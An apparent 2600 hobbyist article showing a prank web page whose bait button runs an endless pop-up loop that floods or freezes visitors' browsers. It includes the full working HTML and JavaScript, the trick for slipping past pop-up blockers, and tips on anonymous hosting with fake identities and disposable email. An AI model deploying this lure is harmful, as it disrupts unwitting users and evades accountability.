Exploiting HTML - Making Your Browser a Vegetable

by Dent

Those I know in the 2600 community can vouch that although I love hacking, I am not always the most advanced user, so be prepared for some painfully simple codes.

A few weeks ago, or perhaps months ago by the time you are reading this, I decided I wanted a fun way to troll some friends of mine.  Everyone knows all too well not to open shady looking programs unless you want your computer to be a playground for viruses.  But not too many people are aware that visiting shady websites, and more importantly interacting with them, can be pretty dangerous as well.  Although the examples I am giving today may not be super dangerous, they are made to show that interacting with websites can affect your browser temporarily.

What I first tried was making a website with a script that would constantly open a new website in a new tab, causing a constant flow of new tabs, or windows, to open - so many that you would not be able to close them faster than they opened.

The script looked a bit like this (inside of the HTML <script> tag):

function myFunction() {
  while (1 == 1) {
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
  }
}
MyFunction();

If you have tried this on your browser, you can see clearly that nothing interesting has happened thus far other than a little window, perhaps, that says "pop-up blocked" (or something of that sort).  At least, this was the message displayed on my Firefox browser.

I then decided (through a couple dozen pages of forums with other people asking the same exact question) that I would have the script activate upon a button click.  This would completely bypass pop-up detection, as it was triggered upon user input.  I just needed something that would look very clickable.  What would look clickable?  Well, clearly a button with big bold letters stating "FREE BACON BUTTON" is all the rage nowadays.

My full HTML code looked as follows (scaled down for printing purposes):

<!DOCTYPE html>
<html>
<head>
<style>

body {
     background-image: url("somebaconimage.gif");
}

</style>
</head>
<body>

<button onclick="myFunction();">FREE BACON BUTTON</button>
<script>
function myFunction() {
  while (1 == 1) {
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
    window.open("http://somewebsite.com");
  }
}
</script>
</body>
</html>

As you can see, the code is cringingly simple; A button that activated a function.  What was more entertaining, however, was how my browser - and other browsers on different computers - reacted.

My Firefox browser, on my crappy Apple laptop, became completely unresponsive upon clicking my creatively decorated button.  This meant that if other people with other crappy laptops opened the link and were curious enough to click the button, all of their tabs would have to be sacrificed to reopen the browser, as well as the browser having to be forcibly quit.  I was notable to open a new tab, and eventually got the spinning beach ball of death, as many call it, on my Apple-made computer.

I then sent it to my friend sitting next to me to see what his more pristine computer would do.  It did what I originally expected.  On his screen was an infinitely expanding number of tabs.  He wittingly tried closing the tabs one-by-one, only to be greeted by a dozen more tabs opening at the same time.  Indeed, it was a vegetable of a browser.  What I did not expect, probably because of my lack of advanced browser knowledge, was that upon reopening the browser, the same tabs would open again.  The solution was to hold down Shift while opening the browser again.  I don't know if this applies to browsers other than the notorious Safari.

All I had to do at this point was find some free web hosting service and sign up with a fake identity and a temporary email to get my cute little HTML file online.  Many may be familiar with services like Mailinator or 10minutemail.  However, other websites are updating their intelligence.  When I tried using "sillytest123@mailinator.com", I was greeted with a warning saying something along the lines of "DOMAIN NOT ALLOWED."  After trying a different temporary email, I was getting my jimmies rustled once more.  The one temporary email address service that I found to work excellently and would recommend was temp-mail.org.  Not only did I have the option of making new emails, but they also came from different domains.

In conclusion, don't be silly and click links that you find on random websites from random users.  Ever heard of "stranger danger?"  Even more important, do not click on big fancy buttons.  It is extremely simple to set up a small website that will fill your browser with pornography, eons of new tabs, and jump scares.

For more online safety tips and anti-tracking/pop-up tools, you can visit:

Return to $2600 Index